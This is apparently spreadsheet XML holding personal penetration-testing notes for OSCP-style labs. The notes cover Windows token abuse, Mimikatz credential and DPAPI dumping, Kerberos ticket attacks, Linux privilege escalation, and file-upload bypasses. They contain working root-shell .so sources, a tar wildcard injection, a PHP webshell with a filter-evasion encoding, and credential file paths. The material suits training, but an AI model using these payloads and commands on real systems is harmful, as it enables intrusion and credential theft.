- Gives you write access to any file on the system, provided FILE_FLAG_BACKUP_SEMANTICS flag is set
- Also allows the holding process or thread to change the owner of a file
</t>
  </si>
  <si>
    <t xml:space="preserve">SeCreateTokenPrivilege
- Allows you to craft a new impersonation token that matches the requesting token of a privileged group
</t>
  </si>
  <si>
    <t xml:space="preserve">SeLoadDriverPrivilege
- Allows you to create svc details under \Registry\User\S-1-5-21-*-RID\system\currenctcontrolset\service\drivername
</t>
  </si>
  <si>
    <t xml:space="preserve">SeImpersonatePrivilege
- Get a handle to a privileged impersonation. Common in windows service accounts.
- Juicy Potato (https://github.com/ohpe/juicy-potato), RoguePotato (https://github.com/antonioCoco/RoguePotato), Hot Potato (https://github.com/Kevin-Robertson/Tater), or PrintSpoofer (https://github.com/itm4n/PrintSpoofer) for great victory.
</t>
  </si>
  <si>
    <t>Juicy potato no longer works as of Windows Server 2019</t>
  </si>
  <si>
    <t xml:space="preserve">SeAssignPrimaryTokenPrivilege
- Pretty similar to SeImpersonatePrivilege
- Juicy Potato (etc) for great victory (https://github.com/ohpe/juicy-potato)
</t>
  </si>
  <si>
    <t>File read only?</t>
  </si>
  <si>
    <t xml:space="preserve">Registry backups:
- c:\windows\system32\config\RegBack\
- c:\windows\repair\
-- Look for SYSTEM, SAM, SYSTEM.OLD, SAM.OLD
</t>
  </si>
  <si>
    <t>DLL hijacking</t>
  </si>
  <si>
    <t xml:space="preserve">Windows applications with DLL dependencies search for those DLLs in the following locations, in order:
- The directory from which the application was launched
- The native Windows system directory (c:\windows\system32)
- The 16bit Windows system directory (c:\windows\system)
- The Windows directory (c:\windows)
- The current directory at application launch time
- Any directories specified by the %PATH% environment variable
If you have write permissions to these folders, you can write a malicious DLL with the same filename as the one being sought by the application, place it in the folder, and it will be executed by the application as long has it has not found a matching DLL in a higher folder in this heirarchy.
</t>
  </si>
  <si>
    <t xml:space="preserve">DLL hijacking can be detected through Process Monitor (sysinternals). If available, copy the binary off the target machine and into a Windows test machine:
- Run process monitor (procmon) and create a filter specifying 'process name is &lt;filename&gt;'. Start the capture and execute the binary.
- Look for 'NAME NOT FOUND' errors for DLLs and observe the path
- Check for write permissions on that path
- Generate a dll payload, place in path, and restart the service for great victory.
</t>
  </si>
  <si>
    <t>Kernel exploits</t>
  </si>
  <si>
    <t xml:space="preserve">https://github.com/SecWiki/windows-kernel-exploits
https://github.com/njahrckstr/Windows_Kernel_Sploit_List
</t>
  </si>
  <si>
    <t>Credential harvesting
- Remember that SYSTEM also has credentials and vaults!
- Some things done here can also be done with SharpDPAPI, if you're having issues running Mimikatz
- I have some notes from a course that say rather than using the DPAPI masterkey string, you should use the DPAPI masterkey SHA1 - which is generally included with these commands. I'm not 100% where this fits in, but you can always try it.</t>
  </si>
  <si>
    <t xml:space="preserve">Windows holds credentials in a few different places. Here's some references in the processes to obtain them. Also see:
https://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/
</t>
  </si>
  <si>
    <r>
      <t>Credential manager (credman)</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
A users (encrypted) credential manager files are held in c:\Users\&lt;user&gt;\AppData\(Local or Roaming)\Microsoft\Credentials\ - it has a GUID filename. An advantage of this attack (excepting any sekurlsa commands) is that you don't need to touch the lsass process to do it, meaning you can execute this attack without admin privileges. System credentials can also be found in (c:\Windows\System32\Config\systemprofile\AppData\local\Microsoft\Credentials. If you have a user session, you should be able to decrypt this with just the session by using Mimikatz (dpapi::cred /in:&lt;path_to_file&gt; /unprotect). In my testing this doesn't always work (ERROR ... CryptUnprotectData), so you may need the users DPAPI master key.
</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">DPAPI master keys
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">A users (also encrypted) master key is found at c:\users\&lt;user\AppData\Roaming\Microsoft\Protect\&lt;SID&gt;\&lt;GUID&gt;. If the above command didn't work, mimikatz will (hopefully) tell you the GUID of the master key that's required under the guidMasterKey heading. You can try looking in memory (mimikatz sekurlsa::dpapi - requires admin/SYSTEM privileges), or decrypting the master key with a session (dpapi::masterkey /in:&lt;path_to_masterkey_file&gt;). Once you have the master key, simply add the key value to the above command with /masterkey:&lt;value&gt;.
If you're in an Active Directory domain, the masterkey is encrypted with the Domain Controllers master key. Luckily, seeing as the domain controller needs to provide this key for standard auth, you can just ask the DC to decrypt it for you, by adding (/rpc) to your (dpapi::masterkey) command. Alternatively, you can ask the DC to just give you it's masterkey, so you can go on an decrypt any masterkeys in the system, even offline (mimikatz lsadump::backupkeys /system:&lt;FQDN&gt; /export). This will export .pvk files, which you can then add to your (dpapi::masterkey) command with (/pvk:&lt;path_to_pvk&gt;).
</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>Windows vault</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
Windows vault is similar to credential manager in that it can store Windows and Web credentials. It is located in c:\Users\&lt;user&gt;\Appdata\Local\Microsoft\Vault\&lt;vault_GUID&gt;\ and has a file Policy.vpol and one or more .vcrd files. The Policy.vpol is protected by the user's DPAPI masterkey and contains AES128 and AES256 keys for the corresponding .vcrd files. They can be extracted with Mimikatz (dpapi::vault /cred:&lt;path_to_vcrd&gt; /policy:&lt;path_to_policy.vpol&gt; /masterkey:&lt;key_value&gt;).
</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>Chrome</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
Google Chrome stores the passwords it holds using the same DPAPI master key as above. The files are stored in c:\users\&lt;user&gt;\AppData\Local\Google\Chrome\User Data\Default\Login Data\. You can extract them with Mimikatz (dpdpa::chrome /in:&lt;path_to_chrome_passwords&gt; /unprotect) if you have a session, although you may need to extract and pass the user DPAPI master key as above by adding (/masterkey:&lt;key_value&gt;) to the command.
</t>
    </r>
  </si>
  <si>
    <t>Mimikatz commands
- Remember to use privilege::debug first!</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>LSA protection removal:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
!processprotect /process:lsass.exe /remove
</t>
    </r>
  </si>
  <si>
    <t>CRYPTO::Certificates – list/export certificates
KERBEROS::Golden – create golden/silver/trust tickets
KERBEROS::List – List all user tickets (TGT and TGS) in user memory. No special privileges required since it only displays the current user’s tickets.Similar to functionality of “klist”.
KERBEROS::PTT – pass the ticket. Typically used to inject a stolen or forged Kerberos ticket (golden/silver/trust).
LSADUMP::DCSync – ask a DC to synchronize an object (get password data for account). No need to run code on DC.
LSADUMP::LSA – Ask LSA Server to retrieve SAM/AD enterprise (normal, patch on the fly or inject). Use to dump all Active Directory domain credentials from a Domain Controller or lsass.dmp dump file. Also used to get specific account credential such as krbtgt with the parameter /name: “/name:krbtgt”
LSADUMP::SAM – get the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts. This is used to dump all local credentials on a Windows computer.
LSADUMP::Trust – Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly). Dumps trust keys (passwords) for all associated trusts (domain/forest).</t>
  </si>
  <si>
    <t>MISC::AddSid – Add to SIDHistory to user account. The first value is the target account and the second value is the account/group name(s) (or SID). Moved to SID:modify as of May 6th, 2016.
MISC::MemSSP – Inject a malicious Windows SSP to log locally authenticated credentials.
MISC::Skeleton – Inject Skeleton Key into LSASS process on Domain Controller. This enables all user authentication to the Skeleton Key patched DC to use a “master password” (aka Skeleton Keys) as well as their usual password.
PRIVILEGE::Debug – get debug rights (this or Local System rights is required for many Mimikatz commands).
SEKURLSA::Ekeys – list Kerberos encryption keys
SEKURLSA::Kerberos – List Kerberos credentials for all authenticated users (including services and computer account)
SEKURLSA::Krbtgt – get Domain Kerberos service account (KRBTGT)password data
SEKURLSA::LogonPasswords full– lists all available provider credentials. This usually shows recently logged on user and computer credentials.
SEKURLSA::Pth – Pass- theHash and Over-Pass-the-Hash
SEKURLSA::Tickets – Lists all available Kerberos tickets for all recently authenticated users, including services running under the context of a user account and the local computer’s AD computer account. Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa can access tickets of others sessions (users).
TOKEN::List – list all tokens of the system
TOKEN::Elevate – impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box
TOKEN::Elevate /domainadmin – impersonate a token with Domain Admin credentials.</t>
  </si>
  <si>
    <t xml:space="preserve">Active directory / Kerberos
</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">Kerberos basics
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">Kerberos works by the exchange of tickets to authenticate accounts for certain actions.
1. User logs into the domain with username and password. This is authenticated against the Domain Controller (DC - which also functions as the Key Distribution Centre (KDC)) with the password hash and a timestamp.
2. This process is called the Authentication Server Request (AS_REQ). If it is successful the DC replies with an Authentication Server Reply (AS_REP).
3. The AS_REP contains a session key (Kerberos is stateless) encrypted with the user's password hash, and a Ticket Granting Ticket (TGT) encrypted by the Ticket Granting Service Secret Key </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>(NT hash of the KRBTGT user)</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">. Expires in 10 hours by default (new one automatically requested at that time).
4. When the user seeks access to a domain resource (network share, Exchange mailbox, application, etc), the user makes a Ticket Granting Service Request (TGS_REQ) to the Ticket Granting Service on the DC/KDC.
5. The TGS_REQ contains the current user, a timestamp encrypted with the session key, the Service Principal Name (SPN. Eg: HTTP/svMSSQL.svcorp.com. This is effectively a domain service account. Think like www-data), and the (encrypted) TGT.
6. If the SPN exists in the domain, the TGT is decrypted and the session key extracted and used to decrypt the username and timestamp. The following checks are conducted:
    a. The TGT must have a valid timestamp
    b. The username from the TGS_REQ must match the username from the TGT
    c. The client IP needs to match the TGT IP.
7. If successful, the TGS responds with a Ticket Granting Server Reply (TGS_REP), containing: 
    a. the SPN to which access has been granted, encrypted with the users session key
    b. a new session key to be used between the client and SPN, also encrypted with the users session key
    c. a service ticket (ocassionally also called TGS - the same name as the actual service that grants the tickets) containing the username, group memberships, and the new session key, encrypted with the password hash of the service account (SPN).
8. The client then sends an application request (AP_REQ) to the application server, that includes the username and timestamp (encrypted with the new session key) and the service ticket.
9. The application server decrypts the service ticket using the service account password hash and extracts the username and session key. It then uses the session key to decrypt the username from the AP_REQ. If the username matches the ones decrypted from the service ticket, the request is accepted.
10. The application server inspects the supplied group memberships, assigns appropriate permissions, and grants access to the service.
</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>Enumeration</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
The best way I've found by far to enumerate the Active Directory environment is through Bloodhound. This has the added advantage of exporting into a database which can then be queried locally. Bloodhound is designed to audit privilege pathways in AD environments, and it works very well to create attack pathways, leveraging privileges to get to Domain Admin.
It comes packaged with a bunch of standard queries, but you can google for others if you're not sure how to make Cypher queries. You can also right click on the paths to see more information and how to execute the attack.
Bloodhound can be run remotely with any domain credentials, or locally with empires powershell/situational_awareness/network/bloodhound3 (make sure to use bloodhound3 and not bloodhound. The latest version of kali does not have compatibility with bloodhound2).
Domain can also be enumerated through a Powershell Empire agent. Look at:
- powershell/situational_awareness/network/powerview/get_computer
- powershell/situational_awareness/network/powerview/get_user
- Basically any of the powerview modules
</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>Attacks</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
1. Cached credentials and tickets.
- User hashes are cached in memory (Local Security Authority Subsystem Service (LSASS) memory space) in order to renew TGTs. If you have SYSTEM (or local admin) mimikatz can extract these with lsadump (lsadump::dcsync /domain:&lt;FQDN&gt; /user:&lt;user&gt;) or logonpasswords (sekurlsa::logonpasswords).
- TGTs and service tickets (/TGS) can likewise be extracted with mimikatz (sekurlsa::tickets).
</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">2. AS-REP Roasting
A non-default option in Kerberos allows accounts to have pre-authentication disabled. This means that the username and password does not need to be supplied (step 1) in order to receive a TGT (step 3). The TGT session key is encrypted with the users password hash, which can be cracked offline. Use GetNPUsers.py with a user list to see who has this set and output their hashes in john format.
</t>
  </si>
  <si>
    <t xml:space="preserve">3. Service account attacks (Kerberoasting)
- As shown in step 7, valid TGS_REQs for any valid service account will return a TGS_REP with a service ticket encrypted with the service account password hash (7.c). This can be extracted and cracked offline as long as you can make a valid TGS_REQ.  Targets service accounts with good permissions but weak passwords.
    - If you have a session:
        a. Use impacket's GetUserSPNs.ps1 to enumerate accounts with SPN values set. Grab the service principal name.
        b. Use powershell to request a service ticket for the SPN (in commands under Kerberos)
        c. Use mimikatz (kerberos::list /export) to export the tickets as files for offline cracking. 
    - If you have a username and password? Use impacket-GetUserSPNs remotely. This outputs in john format.
</t>
  </si>
  <si>
    <t>Many AD based attacks rely on hostnames to execute properly. When pentesting an AD domain, add each host (and the DC) to your /etc/hosts file so that hostnames can be executed properly.</t>
  </si>
  <si>
    <t>4. Silver ticket (forge TGS tickets)
- As shown in steps 7 and 8 (and in kerberoasting above and golden tickets below) if you are able to capture the TGS NTHASH you can forge TGS tickets and access resources without speaking to the KDC/DC. 
- If you can capture the NTHASH for the CIFS SPN, you can forge a service ticket to grant you admin rights to any Windows share on a target computer.
- Once you have rights on a share, you can search for other credentials/hashes (try DC C:\windows\SYSVOL) and hunt for the KRBTGT hash to create golden tickets
- Service accounts are able to do different things - CIFS is a good one because it allows you to access shares, but check the capabilties of others.</t>
  </si>
  <si>
    <t>5. Golden ticket (forge TGT tickets)
A golden ticket attack is when you have captured the KRBTGT service account NT hash. As shown in step 3, TGTs are encrypted with this hash. So if you own the hash, you can generate your own tickets, masquerade as any user (including non-existent users), and access any resource/system in the domain for the next, like, 10 years.
The easiest way to get the KRBTGT hash is to already be a domain admin, however any user with dcsync privileges (Replicating Directory Changes, Replicating Directory Changes All, and Replicating Directory Changes in filtered set) can grab it through Mimikatz lsadump (session) or impacket secretsdump (username/password or NTHASH).
Can also be dumped from ntds.dit file (C:\Windows\NTDS) with mimikatz/dcsync_hashdump or ntdsutil.</t>
  </si>
  <si>
    <t xml:space="preserve">Check the status of your shell with 'su'. If you get a password prompt, hit enter and return to your CLI. If you get 'must be run through terminal' upgrade to a TTY/PTY shell asap - you don't know what you're missing out on seeing.
Pseudo-shells can still have problems - including executing binaries, etc. Best shell is SSH - but socat raw shells have been shown to be pretty powerful too.
</t>
  </si>
  <si>
    <t xml:space="preserve">Run linPEAS.sh (-a for slow and noisy, -s for fast and quiet) on target if you are able. This will automate a lot of enumeration, however can take a LONG time to complete. May be better to run in a second shell, while you go through manual enumeration steps in another shell.
</t>
  </si>
  <si>
    <t xml:space="preserve">SUID / SGID binaries - either through manipulation or through escape. Check GTFOBins (google) for ways to escape common binaries.
</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Check to see if SUID/SGID binaries are calling other binaries through a shell:
- $&gt; strings &lt;binary&gt;
- $&gt; strace -v -f -e execve &lt;binary&gt; 2&gt;&amp;1 | grep service
- $&gt; ltrace &lt;binary&gt;
Check the version of the shell being called, including /bin/sh. Some distros have /bin/sh as a symlink to /usr/bin/dash - others have it to an old bash version.
- $&gt; /bin/sh --version
If other binaries are being shell-called without absolute paths (eg 'service apache2 start'). Then you can create a binary called 'service' and export your path variable prioritising your current directory, then run the SUID binary:
- $&gt; PATH=.:$PATH &lt;binary&gt;
If other binaries are being shell-called with absolute paths (eg '/usr/sbin/service apache2 start') AND the bash version is lower than 4.2.048 then you can define a bash function with forward slashes, giving it precedence over the absolute path:
- $&gt; function /usr/sbin/service { /bin/bash -p; }
- $&gt; export -f /usr/sbin/service
- $&gt; &lt;binary&gt;
If other binaries are being shell-called </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>AND</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve"> bash version is &lt;4.4, then you can modify the PS4 environment variable and run the binary in debug mode and is inherited. You can test this with using whoami in the bash command and seeing what is prepended onto the debug output:
- $&gt; env -i SHELLOPTS=xtrace PS$='$(&lt;bash_command&gt;)' &lt;binary&gt;
</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">Wildcard expansion - root commands that run with wildcards (eg 'tar czf /tmp/backup.tar.gz *' in a cron job) can have their command parameters hijacked by creating filenames with command line options, eg:
$&gt; touch ./--checkpoint=1
$&gt; touch ./--checkpoint-action=exec=shell.elf
When bash expands the wildcard in the cron job, these files will be included in the command line as space-separated values and executed as command options. See GTFOBins for good options.
</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">NFS shares - By default, NFS shares inherit the </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>remote</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve"> users UID and GID. If a file in an NFS share is owned by UID 1002, you can create a local user with UID 1002, connect to the share, and have control &amp; ownership of the file.
Also by default, this does not work for root due to the NFS setting root_squash, where a user connecting with UID 0 will be squashed to nobody:nogroup. Check /etc/exports for a no_root_squash setting, which will allow you to connect as root and create SUID binaries for privesc through a session on the machine.
</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">sudo based SO hijacking as per below (check env_keep settings when executing sudo -l)
</t>
  </si>
  <si>
    <t>SO hijacking</t>
  </si>
  <si>
    <t xml:space="preserve">Similar to DLL hijacking, Linux applications have a hierarchy of locations from which to search for Shared Objects (.so files). The hierarchy is:
- Any directories specified at compilation by -rpath-link options (RPATH)
- Any directories specified at compilation by -rpath options (RPATH)
- If 1 and 2 aren't used, the OS will search the LD_RUN_PATH and LD_LIBRARY_PATH environment variables
- Directories defined in the DR_RUNPATH environment variable
- Directories defined in the DR_RPATH environment variable
- Default library directories /lib and /usr/lib
- Any directories defined in /etc/ld.so.conf
Find .so files required by the binary with: strace &lt;binary&gt; 2&gt;&amp;1 | grep -iE "open|access|no such file"
If you have write permissions to these folders, you can write a malicious SO file with the same filename as the one being sought by the application, place it in the folder, and it will be executed by the application as long has it has not found a matching SO file in a higher folder in this heirarchy. You can use the binary from LD_LIBRARY_PATH exploitation below.
The existence of RPATH variables and locations can be found with: objdump -x &lt;application&gt; | grep 'RPATH\|RUNPATH'
SO file details can be determined with ldd &lt;application&gt;
</t>
  </si>
  <si>
    <t>If env_keep+=LD_PRELOAD is set (see quick wins), then a preload.so binary can hijack the execution of any permissible sudo command. Create a .so file similar to:
#include &lt;stdio.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;stdlib.h&gt;
void _init() {
unsetenv("LD_PRELOAD");
setresuid(0,0,0);
system("/bin/bash -p");
}
Compile with: gcc -shared -nostartfiles -o /tmp/preload.so &lt;filename.c&gt; (add -fPIC for x64 systems).
Execute any permissible sudo command with: sudo LD_PRELOAD=/tmp/preload.so &lt;sudo_command&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">If env_keep+=LD_LIBRARY_PATH is set (see quick wins), then the library path can be specified to a writeable path for so hijacking:
Use ldd &lt;binary&gt; to find dependant .so files for the binary. Create a .so file similar to:
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
static void hijack() __attribute__((constructor));
void hijack() {
unsetenv("LD_LIBRARY_PATH");
setresuid(0,0,0);
system("/bin/bash -p");
}
Compile with gcc -o /tmp/&lt;name_of_dependent_so_file_from_ldd&gt; -shared &lt;filename.c&gt; (add -fPIC for x64 systems).
Execute any permissible sudo command with: sudo LD_LIBRARY_PATH=/tmp/ &lt;sudo_command&gt; </t>
  </si>
  <si>
    <t>When demonstrated, the .so was compiled and placed in the current working directory, then executed with LD_LIBRARY_PATH=. 
I don't think this matters, but noted just in case it does.</t>
  </si>
  <si>
    <t xml:space="preserve">Set a time limit on how long you're going to spend trying kernel exploits
searchsploit linux kernel | grep -v dos | grep ' &lt;version_digit&gt;\.' | grep -i 'root\|privilege\|exploit'
https://github.com/lucyoa/kernel-exploits
https://github.com/bwbwbwbw/linux-exploit-binaries
https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack
https://github.com/SecWiki/linux-kernel-exploits
</t>
  </si>
  <si>
    <t>First digit of kernel version (ie, '3.0.0' = '3')</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>Passwords/hashes/keys:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
/etc/passwd 
/etc/shadow
~/.ssh/id_rsa
~/.ssh/id_rsa.pub
/var/backups/passwd
/var/backups/shadow
</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>Cron jobs:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
/var/spool/cron/&lt;user&gt;
/var/spool/cron/crontabs/&lt;user&gt;
/etc/crontab
</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>Mail:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
/var/spool/mail/&lt;user&gt;
</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>Histories:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
/root/.bash_history
/home/&lt;user&gt;/.bash_history
</t>
    </r>
  </si>
  <si>
    <t>Method</t>
  </si>
  <si>
    <t xml:space="preserve">Run nikto and gobuster. Do it for every web service. The obvious way is rarely the way.
</t>
  </si>
  <si>
    <t xml:space="preserve">EXPLORE the webservice while this is happening. Don't get hung up on any one thing. If it looks interesting, take notes and move on.
</t>
  </si>
  <si>
    <t xml:space="preserve">Is the web application open source? Can you download a local copy from github? What about downloading from exploitdb? Using Agent Ransack on a local copy is way easier than dirbuster.
</t>
  </si>
  <si>
    <t xml:space="preserve">Don't be afraid to google or searchsploit for individual items that you find in the webserver. One OSCP lab had a webserver with a known vulnerable webapp, but that was a red herring. The actual vulnerability was in a file listed directory.
</t>
  </si>
  <si>
    <t>Why isn't my webshell working?</t>
  </si>
  <si>
    <t xml:space="preserve">PHP can be configured to not allow system, shell_exec, etc. This is in the php.ini config file located (default) at /etc/php/&lt;version&gt;/apache2/php.ini (there's also a 'cli' folder alongside 'apache2'), although the location of this file will be shown in phpinfo();
</t>
  </si>
  <si>
    <t xml:space="preserve">If using reverse shells, check your listen port. OSCP boxes are known to have outbound firewalls. Try listening on 80/443.
</t>
  </si>
  <si>
    <t xml:space="preserve">How did you put your shell on target? If through SQL injection or similar, you may have issues with bad characters (SQL can break with single quotes - try using doubles). If you can, upload your shell and see if you read it without executing to see how it landed (upload as .txt maybe?). The base64 LFI read above is good for this.
</t>
  </si>
  <si>
    <t xml:space="preserve">Check that the webshell is in a format and location that the server can understand. If it's PHP, check that PHP is installed and permitted in that folder. Sometimes, simply changing a file extension (such as from .pl to .cgi) can cause the server to interpret it differently.
</t>
  </si>
  <si>
    <t>File upload restriction bypass</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">File extension restrictions:
</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">Alternate extensions
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">PHP:    .phtml, .php, .php3, .php4, .php5, .inc
ASP:    .asp, .aspx
Perl:   .pl, .pm, .cgi, .lib
JSP:    .jsp, .jspx, .jsw, .jsv, .jspf
Coldfusion:    .cfm, .cfml, .cfc, .dbm
</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>Double extensions</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
Eg: shell.jpg.php
</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">.htaccess upload </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">(Apache)
'.htaccess files provide a way to make configuration changes on a per-directory basis' (Apache docs)
If you can upload a file named (exactly) '.htaccess' with the following content:
    AddType application/x-httpd-php .shell
    php_value display_errors 1
Then Apache will treat all files with extension '.shell' as PHP.
</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>Blacklisted MIME type:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
Replace the 'Content-type:' header value with another. A full list is available here:
https://slick.pl/kb/htaccess/complete-list-mime-types/
</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>Content filtering:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
If the filter is conducting string detection (ie, denying '&lt;?') you can bypass this by encoding the PHP into Unicode-16BE. Here's some simple python:
    shell = "&lt;?php system($_GET['cmd']); ?&gt;"
    outfile = open('shell.php','wb')
    outfile.write(shell.encode('utf-16be'))
Note that the PHP server will need to be able to read PHP in Unicode. If this isn't set, you can try the .htaccess method above with the following:
    php_value zend.multibyte 1
    php_value zend.detect_unicode 1
</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Images only restrictions:
</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>PHP exif_imagetype()</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">This common PHP filter detects if the file is an image. It can be bypassed by using the .XBM image format, which only requires two lines, (beginning with '#' so they don't interrupt PHP), to validate (these values can be any number really):
    #define width 1337
    #define height 1337
You can also try adding a GIF header to the top of your code:
    GIF89a;
</t>
    </r>
    <r>
      <rPr>
